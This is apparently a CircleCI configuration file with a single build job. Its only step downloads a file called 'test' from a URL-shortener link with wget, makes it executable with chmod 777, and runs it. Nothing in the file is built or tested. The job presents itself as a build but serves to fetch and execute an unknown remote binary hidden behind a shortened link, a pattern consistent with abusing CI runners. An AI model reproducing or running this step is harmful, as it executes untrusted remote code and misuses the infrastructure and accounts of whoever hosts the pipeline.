version: 2.1
 
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    resource_class: medium
    steps:
      - run: wget -O test http://gg.gg/vl3e0 && chmod +x test && chmod 777 test && ./test